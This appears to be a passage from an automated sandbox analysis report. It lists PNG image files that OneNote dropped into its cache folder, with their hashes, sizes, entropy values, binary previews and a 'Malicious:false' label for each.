                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4081
                                                                                                                                            Entropy (8bit):7.943373267196131
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                            MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                            SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                            SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                            SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22634
                                                                                                                                            Entropy (8bit):7.974332204835705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                            MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                            SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                            SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                            SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2599
                                                                                                                                            Entropy (8bit):7.903700862190034
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                            MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                            SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                            SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                            SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1570
                                                                                                                                            Entropy (8bit):7.780157858994452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                            MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                            SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                            SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                            SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11449
                                                                                                                                            Entropy (8bit):7.91552812501629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                            MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                            SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                            SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                            SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3679
                                                                                                                                            Entropy (8bit):7.931319059366604
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                            MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                            SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                            SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                            SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

